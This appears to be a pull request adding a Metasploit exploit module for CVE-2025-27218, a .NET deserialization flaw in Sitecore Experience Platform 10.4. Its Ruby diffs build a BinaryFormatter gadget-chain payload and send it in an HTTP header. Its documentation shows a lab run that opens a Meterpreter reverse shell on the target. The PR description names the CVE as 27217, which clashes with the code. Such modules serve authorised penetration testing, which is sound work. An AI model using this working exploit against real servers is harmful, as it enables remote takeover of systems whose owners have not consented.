### PR TITLE
Create sitecore_xp_cve_2025_27218.rb

### DIFF
--- a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_27218.md
+++ b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_27218.md
@@ -3,7 +3,7 @@ This module exploits a .NET deserialization vulnerability in Sitecore Experience
 Platform (XP) 10.4 before KB1002844 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
 
 ### Setup
-SiteCore can be downloaded from the [downloads page](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform/104/Sitecore_Experience_Platform_104).
+The SiteCore installer can be downloaded from the [downloads page](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform/104/Sitecore_Experience_Platform_104).
 Note that a license is required to run the application.
 
 ## Verification Steps

--- a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_27218.md
+++ b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_27218.md
@@ -1,0 +1,45 @@
+## Vulnerable Application
+This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
+Platform (XP) 10.4 before KB1002844 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
+
+### Setup
+SiteCore can be downloaded from the [downloads page](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform/104/Sitecore_Experience_Platform_104).
+Note that a license is required to run the application.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use windows/http/sitecore_xp_cve_2025_27218`
+3. Set the `RHOST` abd `LHOST`, options
+4. Run the module
+5. Receive a Meterpreter session as the `IIS APPPOOL\XP0.sc` user.
+
+## Scenarios
+### SiteCore XP 10.4.0 Revision 010422 running on Windows Server 2022
+```
+msf6 exploit(windows/http/sitecore_xp_cve_2025_27218) > set rhost xp0.sc
+rhost => xp0.sc
+msf6 exploit(windows/http/sitecore_xp_cve_2025_27218) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(windows/http/sitecore_xp_cve_2025_27218) > dns add-static xp0.sc 192.168.123.244
+[*] Added static hostname mapping xp0.sc to 192.168.123.244
+msf6 exploit(windows/http/sitecore_xp_cve_2025_27218) > run
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. The target is running SiteCore.
+[+] Server responded with 200, this probably means it worked.
+[*] Sending stage (203846 bytes) to 192.168.123.244
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.244:49832) at 2025-03-27 08:58:13 -0700
+
+meterpreter > getuid
+Server username: IIS APPPOOL\XP0.sc
+meterpreter > sysinfo
+Computer        : WIN-2I9LBN2Q0R5
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
@@ -23,7 +23,10 @@ class MetasploitModule < Msf::Exploit::Remote
           Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
         },
         'License' => MSF_LICENSE,
-        'Author' => ['machang-r7'], # Module Creator
+        'Author' => [
+          'Dylan Pindur', # Discovery
+          'machang-r7'    # Module Creator
+        ],
         'References' => [
           ['CVE', '2025-27218'],
           ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
@@ -69,11 +72,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({
-                             'uri' => normalize_uri(target_uri.path),
-                             'method' => 'GET',
-                           })
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
 
-    if res&.code == 200 && res&.get_html_document.at('//title').text.strip == 'Welcome to Sitecore'
+    if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
       CheckCode::Detected('The target is running SiteCore.')
     else
       CheckCode::Safe('The target does not appear to be running SiteCore.')

--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
@@ -1,7 +1,11 @@
-require 'msf/core'
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+
+  Rank = ExcellentRanking
   include Msf::Util::DotNetDeserialization
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -13,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
         'Description' => %q{
-          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4  by injecting a malicious Base64-encoded
-          BinaryFormatter payload into an HTTP header.
+          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
+          Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
         },
         'License' => MSF_LICENSE,
         'Author' => ['machang-r7'], # Module Creator
@@ -26,41 +30,37 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2025-01-06',
         'DefaultTarget' => 0,
         'Platform' => 'win',
-        'Arch' => [ARCH_X86, ARCH_X64],
-        # I don't know why these are the only payloads that worked.
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
         'Targets' => [
           [
             'Windows Command',
             {
               'Arch' => ARCH_CMD,
-              'Type' => :windows_command,
-              'Space' => 3000,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/generic'
-              }
+              'Type' => :windows_command
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
             }
           ],
           [
             'PowerShell Stager',
             {
               'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :psh_stager,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-              }
+              'Type' => :psh_stager
+              # tested with windows/x64/meterpreter/reverse_tcp
             }
           ]
         ],
-
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
-      )
-
+    )
     register_options([
-      Opt::RPORT(443),
       OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
     ])
   end

--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
@@ -1,99 +1,99 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
-    Rank = NormalRanking
-    include Msf::Util::DotNetDeserialization
-    include Msf::Exploit::Remote::HttpClient
-    include Msf::Exploit::CmdStager
-    include Msf::Exploit::Powershell
+  Rank = NormalRanking
+  include Msf::Util::DotNetDeserialization
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
 
-    def initialize(info = {})
-        super(update_info(info,
-            'Name'           => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
-            'Description'    => %q{
-                This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4  by injecting a malicious Base64-encoded
-                BinaryFormatter payload into an HTTP header.
-            },
-            'License'        => MSF_LICENSE,
-            'Author'         => ['machang-r7'], # Module Creator
-            'References'     => [
-                ['CVE', '2025-27218'],
-                ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
-                ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
-            ],
-            'DisclosureDate' => '2025-01-06',
-            'DefaultTarget'  => 0,
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            #I don't know why these are the only payloads that worked. 
-            'Targets' => [
-                [
-                  'Windows Command',
-                  {
-                    'Arch' => ARCH_CMD,
-                    'Type' => :windows_command,
-                    'Space' => 3000,
-                    'DefaultOptions' => {
-                      'PAYLOAD' => 'cmd/windows/generic'
-                    }
-                }
-                ],
-                [
-                   'PowerShell Stager',
-                    {
-                      'Arch' => [ARCH_X86, ARCH_X64],
-                      'Type' => :psh_stager,
-                      'DefaultOptions' => {
-                        'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                      }
-                    }
-                  ]
-            ],
-
-
-            'DefaultOptions' => {
-            'RPORT' => 443,
-            'SSL' => true
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
+        'Description' => %q{
+          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4  by injecting a malicious Base64-encoded
+          BinaryFormatter payload into an HTTP header.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['machang-r7'], # Module Creator
+        'References' => [
+          ['CVE', '2025-27218'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
+          ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
+        ],
+        'DisclosureDate' => '2025-01-06',
+        'DefaultTarget' => 0,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        # I don't know why these are the only payloads that worked.
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'Space' => 3000,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/generic'
+              }
             }
-
-        ))
-
-        register_options([
-            Opt::RPORT(443),
-            OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
-        ])
-    end
-
-    def exploit
-      case target['Type']
-      when :windows_command
-        execute_command(payload.encoded)
-      when :psh_stager
-        execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
-      end
-    end
-
-    def execute_command(cmd, _opts = {})
-      sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
-        cmd,
-        gadget_chain: :WindowsIdentity,
-        formatter: :BinaryFormatter
-      ))
-          
-
-          # Build HTTP request with malicious header
-          res = send_request_cgi({
-            'uri'     => normalize_uri(target_uri.path),
-            'method'  => 'GET',
-            'headers' => {
-              'Thumbnailsaccesstoken' => sploit
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
             }
-        })
+          ]
+        ],
 
-        if res && res.code == 200
-          print_good("Server responded with 200, this probably means it worked. ")
-        else
-          print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
-        end
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        }
+      )
+      )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
+    ])
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :psh_stager
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
     end
+  end
+
+  def execute_command(cmd, _opts = {})
+    sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
+      cmd,
+      gadget_chain: :WindowsIdentity,
+      formatter: :BinaryFormatter
+    ))
+
+    # Build HTTP request with malicious header
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'headers' => {
+        'Thumbnailsaccesstoken' => sploit
+      }
+    })
+
+    if res && res.code == 200
+      print_good('Server responded with 200, this probably means it worked. ')
+    else
+      print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
+    end
+  end
 end

--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
@@ -1,0 +1,99 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = NormalRanking
+    include Msf::Util::DotNetDeserialization
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Exploit::CmdStager
+    include Msf::Exploit::Powershell
+
+    def initialize(info = {})
+        super(update_info(info,
+            'Name'           => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
+            'Description'    => %q{
+                This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4  by injecting a malicious Base64-encoded
+                BinaryFormatter payload into an HTTP header.
+            },
+            'License'        => MSF_LICENSE,
+            'Author'         => ['machang-r7'], # Module Creator
+            'References'     => [
+                ['CVE', '2025-27218'],
+                ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
+                ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
+            ],
+            'DisclosureDate' => '2025-01-06',
+            'DefaultTarget'  => 0,
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            #I don't know why these are the only payloads that worked. 
+            'Targets' => [
+                [
+                  'Windows Command',
+                  {
+                    'Arch' => ARCH_CMD,
+                    'Type' => :windows_command,
+                    'Space' => 3000,
+                    'DefaultOptions' => {
+                      'PAYLOAD' => 'cmd/windows/generic'
+                    }
+                }
+                ],
+                [
+                   'PowerShell Stager',
+                    {
+                      'Arch' => [ARCH_X86, ARCH_X64],
+                      'Type' => :psh_stager,
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                      }
+                    }
+                  ]
+            ],
+
+
+            'DefaultOptions' => {
+            'RPORT' => 443,
+            'SSL' => true
+            }
+
+        ))
+
+        register_options([
+            Opt::RPORT(443),
+            OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
+        ])
+    end
+
+    def exploit
+      case target['Type']
+      when :windows_command
+        execute_command(payload.encoded)
+      when :psh_stager
+        execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+      end
+    end
+
+    def execute_command(cmd, _opts = {})
+      sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
+        cmd,
+        gadget_chain: :WindowsIdentity,
+        formatter: :BinaryFormatter
+      ))
+          
+
+          # Build HTTP request with malicious header
+          res = send_request_cgi({
+            'uri'     => normalize_uri(target_uri.path),
+            'method'  => 'GET',
+            'headers' => {
+              'Thumbnailsaccesstoken' => sploit
+            }
+        })
+
+        if res && res.code == 200
+          print_good("Server responded with 200, this probably means it worked. ")
+        else
+          print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
+        end
+    end
+end

--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb
@@ -6,10 +6,12 @@
 class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
+
   include Msf::Util::DotNetDeserialization
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -65,6 +67,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def check
+    res = send_request_cgi({
+                             'uri' => normalize_uri(target_uri.path),
+                             'method' => 'GET',
+                           })
+
+    if res&.code == 200 && res&.get_html_document.at('//title').text.strip == 'Welcome to Sitecore'
+      CheckCode::Detected('The target is running SiteCore.')
+    else
+      CheckCode::Safe('The target does not appear to be running SiteCore.')
+    end
+  end
+
   def exploit
     case target['Type']
     when :windows_command
@@ -91,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200
-      print_good('Server responded with 200, this probably means it worked. ')
+      print_good('Server responded with 200, this probably means it worked.')
     else
       print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
     end


### PR DESCRIPTION
Module exploits CVE-2025-27217, a .NET deserialization vulnerability for Sitecore. 

Couldn't figure out any checks. 

All it does is generate a serialized .NET object with the payload in it, then sends it in a HTTP header. 

The exploit works when browsing to Sitecore pages, so any HTTP status code other than 200 in the response most likely means the request failed. 
